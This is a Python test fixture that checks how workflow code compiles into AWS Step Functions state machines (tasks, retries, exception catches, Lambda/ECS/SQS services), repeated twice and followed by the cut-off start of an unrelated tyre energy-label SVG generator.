"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": "$['output']",
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should include nested state machine",
"""
def nested(data):
return
def main(data):
nested(key="nested")
""",
{
"StartAt": "nested",
"States": {
"nested": {
"Type": "Task",
"Resource": "arn:aws:states:::states:startExecution.sync",
"Parameters": {
"Input": {
"AWS_STEP_FUNCTIONS_STARTED_BY_EXECUTION_ID.$": "$$.Execution.Id",
"__trace.$": "$.__trace",
"data.$": "$",
},
"StateMachineArn": "${StateMachinenested}",
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should catch unnamed exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["States.ALL"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch base exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except Exception:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["Exception"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch custom exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except CustomError:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch multiple exceptions in a single handler",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except (CustomError1, CustomError2):
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError1", "CustomError2"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should parse multiple exception handlers",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except CustomError1:
return
except CustomError2:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError1"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
},
{
"ErrorEquals": ["CustomError2"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
},
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should add retry to the task",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry(
on_exceptions=[CustomError, States.TaskFailed],
interval=10,
max_attempts=5,
backoff_rate=3.0
):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
},
{
"ErrorEquals": ["CustomError", "States.TaskFailed"],
"IntervalSeconds": 10,
"MaxAttempts": 5,
"BackoffRate": 3.0,
},
],
}
},
},
),
(
"Should add retry to the task with default values",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry():
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
},
{
"ErrorEquals": ["Exception"],
"IntervalSeconds": 1,
"MaxAttempts": 3,
"BackoffRate": 2.0,
},
],
}
},
},
),
]
UNSUPPORTED_CASES = [
(
"Should raise if unknown task class",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Unknown()
""",
"Supported expressions",
),
(
"Should raise if invalid key option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key=123)
""",
"key",
),
(
"Should raise if invalid timeout option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(timeout="10")
""",
"timeout",
),
(
"Should raise if invalid result path",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
data["__trace"] = Action(key="action")
""",
"reserved",
),
(
"Should raise if multiple tasks in try body",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
Action()
except:
return
""",
"single task statement",
),
(
"Should raise if else used with try",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
except:
return
else:
return
""",
"`else` part",
),
(
"Should raise if finally used with try",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
finally:
return
""",
"`finally` part",
),
(
"Should raise if invalid service",
"""
class Action(Task):
service = "ec2"
async def run(event, context):
return
def main(data):
Action()
""",
"service",
),
(
"Should raise if multiple tasks in retry block",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry():
Action()
Action()
""",
"single task",
),
(
"Should raise if unsupported context manager in with block",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with open():
Action()
""",
"context manager",
),
]
if __name__ == "__main__":
unittest.main() | tests/test_task.py | import unittest
from .util import StateTestCase
class TestTaskState(StateTestCase):
    """Tests for the Task state.

    Declarative fixtures: SUCCESSFUL_CASES holds
    (description, workflow source, expected state-machine dict) tuples;
    UNSUPPORTED_CASES holds
    (description, workflow source, expected error-message substring) tuples.
    NOTE(review): presumably executed by StateTestCase -- confirm in .util.
    """
SUCCESSFUL_CASES = [
(
"Should include a basic task",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set lambda service",
"""
class Action(Task):
service = "lambda"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set lambda:pexpm-runner service",
"""
class Action(Task):
service = "lambda:pexpm-runner"
async def run(event, context):
return
def main(data):
Action(key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"package_name": "${PackageNameAction}",
"package_version": "${PackageVersionAction}",
"command": ["${PackageNameAction}", "run"],
"include_parent_environment": True,
"return_stdout": True,
"environment": {
"SFN_EXECUTION_NAME.$": "$$.Execution.Name",
"SFN_STATE_NAME.$": "$$.State.Name",
"SFN_STATE_MACHINE_NAME.$": "$$.StateMachine.Name",
"TRACE_ID.$": "$.__trace.id",
"TRACE_SOURCE.$": "$.__trace.source",
"SFN_INPUT_VALUE.$": "$",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set ecs service",
"""
class Action(Task):
service = "ecs"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "arn:aws:states:::ecs:runTask.sync",
"Parameters": {
"LaunchType": "FARGATE",
"Cluster": "${ECSClusterArn}",
"TaskDefinition": "${ECSTaskDefinitionAction}",
"NetworkConfiguration": {
"AwsvpcConfiguration": {
"AssignPublicIp": "DISABLED",
"SecurityGroups": [
"${DatabaseSecurityGroup}",
"${PrivateLoadBalancerSecurityGroup}",
],
"Subnets": [
"${Subnet0}",
"${Subnet1}",
"${Subnet2}",
"${Subnet3}",
],
}
},
"Overrides": {
"ContainerOverrides": [
{
"Name": "Action",
"Environment": [
{
"Name": "SFN_EXECUTION_NAME",
"Value.$": "$$.Execution.Name",
},
{
"Name": "SFN_STATE_NAME",
"Value.$": "$$.State.Name",
},
{
"Name": "SFN_STATE_MACHINE_NAME",
"Value.$": "$$.StateMachine.Name",
},
{
"Name": "TRACE_ID",
"Value.$": "$.__trace.id",
},
{
"Name": "TRACE_SOURCE",
"Value.$": "$.__trace.source",
},
],
}
]
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should set ecs:worker service",
"""
class Action(Task):
service = "ecs:worker"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "arn:aws:states:::sqs:sendMessage.waitForTaskToken",
"Parameters": {
"QueueUrl": "${QueueUrlAction}",
"MessageGroupId.$": "States.Format('{}_{}', $$.Execution.Name, $$.State.EnteredTime)",
"MessageAttributes": {
"SFN_EXECUTION_NAME": {
"DataType": "String",
"StringValue.$": "$$.Execution.Name",
},
"SFN_STATE_NAME": {
"DataType": "String",
"StringValue.$": "$$.State.Name",
},
"SFN_STATE_MACHINE_NAME": {
"DataType": "String",
"StringValue.$": "$$.StateMachine.Name",
},
# Pass tracing metadata from the input data object
"TRACE_ID": {
"DataType": "String",
"StringValue.$": "$.__trace.id",
},
"TRACE_SOURCE": {
"DataType": "String",
"StringValue.$": "$.__trace.source",
},
},
"MessageBody": {
"Input.$": "$",
"TaskToken.$": "$$.Task.Token",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should accept key option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should accept timeout option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key="action", timeout=10)
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 10,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should accept input data",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(data["input"], key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$['input']",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set result path",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
data["output"] = Action(data["input"], key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$['input']",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": "$['output']",
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should include nested state machine",
"""
def nested(data):
return
def main(data):
nested(key="nested")
""",
{
"StartAt": "nested",
"States": {
"nested": {
"Type": "Task",
"Resource": "arn:aws:states:::states:startExecution.sync",
"Parameters": {
"Input": {
"AWS_STEP_FUNCTIONS_STARTED_BY_EXECUTION_ID.$": "$$.Execution.Id",
"__trace.$": "$.__trace",
"data.$": "$",
},
"StateMachineArn": "${StateMachinenested}",
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should catch unnamed exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["States.ALL"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch base exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except Exception:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["Exception"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch custom exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except CustomError:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch multiple exceptions in a single handler",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except (CustomError1, CustomError2):
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError1", "CustomError2"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should parse multiple exception handlers",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except CustomError1:
return
except CustomError2:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError1"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
},
{
"ErrorEquals": ["CustomError2"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
},
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should add retry to the task",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry(
on_exceptions=[CustomError, States.TaskFailed],
interval=10,
max_attempts=5,
backoff_rate=3.0
):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
},
{
"ErrorEquals": ["CustomError", "States.TaskFailed"],
"IntervalSeconds": 10,
"MaxAttempts": 5,
"BackoffRate": 3.0,
},
],
}
},
},
),
(
"Should add retry to the task with default values",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry():
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
},
{
"ErrorEquals": ["Exception"],
"IntervalSeconds": 1,
"MaxAttempts": 3,
"BackoffRate": 2.0,
},
],
}
},
},
),
]
UNSUPPORTED_CASES = [
(
"Should raise if unknown task class",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Unknown()
""",
"Supported expressions",
),
(
"Should raise if invalid key option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key=123)
""",
"key",
),
(
"Should raise if invalid timeout option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(timeout="10")
""",
"timeout",
),
(
"Should raise if invalid result path",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
data["__trace"] = Action(key="action")
""",
"reserved",
),
(
"Should raise if multiple tasks in try body",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
Action()
except:
return
""",
"single task statement",
),
(
"Should raise if else used with try",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
except:
return
else:
return
""",
"`else` part",
),
(
"Should raise if finally used with try",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
finally:
return
""",
"`finally` part",
),
(
"Should raise if invalid service",
"""
class Action(Task):
service = "ec2"
async def run(event, context):
return
def main(data):
Action()
""",
"service",
),
(
"Should raise if multiple tasks in retry block",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry():
Action()
Action()
""",
"single task",
),
(
"Should raise if unsupported context manager in with block",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with open():
Action()
""",
"context manager",
),
]
if __name__ == "__main__":
unittest.main() | 0.465387 | 0.362489 |
from pathlib import Path
from typing import Optional
import qrcode
from qrcode.image.svg import SvgPathImage
import xml.etree.ElementTree as ET
from jinja2 import Environment, FileSystemLoader
ROOT_DIR = Path(__file__).resolve().parent
def get_eprel_link(eprel_id: int) -> str:
    """Return the public EPREL QR URL for the given product registration id."""
    return f'https://eprel.ec.europa.eu/qr/{eprel_id}'
class TyreEnergyLabel:
    """
    Tyre energy label generator (renders the label as SVG).

    Example usage:

        label = TyreEnergyLabel(
            supplier='Cool Tyre',
            type_identifier='94385300',
            size='185/75 R16',
            tyre_class='C2',
            fuel_efficiency='E',
            wet_grip='A',
            roll_noise=72,
            noise_level='C',
            snow_grip=True,
            ice_grip=True,
            eprel_id=381667,
            eprel_link='https://eprel.ec.europa.eu/qr/381667'
        )
        label.save('example.svg')

        # optional: get SVG as a string
        svg_data = label.as_svg(embed_fonts=True, include_link=True)
    """

    # Layout metadata handed to the SVG template:
    #  - rating_y: vertical position per grade letter (presumably template
    #    units -- confirm against templates/label.svg.j2)
    #  - icon_x: x positions of the pictograms, keyed by icon count
    #  - allowed_ranges: grade letters shown on the label scale
    META = {
        'rating_y': {'A': 38, 'B': 60, 'C': 83, 'D': 106, 'E': 128},
        'icon_x': {
